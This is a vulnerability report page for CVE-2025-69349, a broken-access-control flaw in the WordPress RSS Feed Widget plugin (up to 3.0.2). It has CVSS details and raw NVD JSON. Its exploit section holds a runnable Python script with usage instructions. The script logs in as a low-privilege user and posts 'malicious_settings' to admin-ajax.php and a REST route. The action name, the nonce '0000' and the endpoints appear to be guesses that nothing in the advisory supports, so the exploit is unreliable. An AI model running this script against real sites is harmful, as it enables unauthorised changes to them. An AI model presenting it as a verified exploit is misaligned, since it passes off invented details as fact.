Security Vulnerability Report
中文
CVE-2025-69349 CVSS 5.4 MEDIUM

CVE-2025-69349

Published: 2026-01-06 17:15:47
Last Modified: 2026-04-27 21:16:25

Description

Missing Authorization vulnerability in Fahad Mahmood RSS Feed Widget rss-feed-widget allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects RSS Feed Widget: from n/a through <= 3.0.2.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

RSS Feed Widget <= 3.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-69349 PoC - Missing Authorization in RSS Feed Widget # This PoC demonstrates the broken access control vulnerability # Affected: RSS Feed Widget <= 3.0.2 import requests import sys def exploit_cve_2025_69349(target_url, username, password): """ Exploit missing authorization vulnerability in RSS Feed Widget plugin. Low-privilege users can perform admin-level actions. """ session = requests.Session() # Step 1: Authenticate with low-privilege account login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Successfully logged in as low-privilege user") # Step 2: Exploit the missing authorization # Target plugin's AJAX or REST API endpoints exploit_endpoints = [ f"{target_url}/wp-admin/admin-ajax.php", f"{target_url}/wp-json/wp/v2/rss-feed-widget", ] for endpoint in exploit_endpoints: # Common vulnerable actions in RSS Feed Widget exploit_data = { 'action': 'rss_feed_widget_admin_action', 'nonce': '0000', # May not be properly validated 'settings': 'malicious_settings' } try: response = session.post(endpoint, data=exploit_data, timeout=10) if response.status_code == 200: print(f"[+] Exploit sent to {endpoint}") print(f"[+] Response: {response.text[:200]}") except requests.RequestException as e: print(f"[-] Request failed: {e}") return True if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://example.com subscriber password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_cve_2025_69349(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69349", "sourceIdentifier": "[email protected]", "published": "2026-01-06T17:15:47.350", "lastModified": "2026-04-27T21:16:25.053", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Fahad Mahmood RSS Feed Widget rss-feed-widget allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects RSS Feed Widget: from n/a through <= 3.0.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/rss-feed-widget/vulnerability/wordpress-rss-feed-widget-plugin-3-0-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}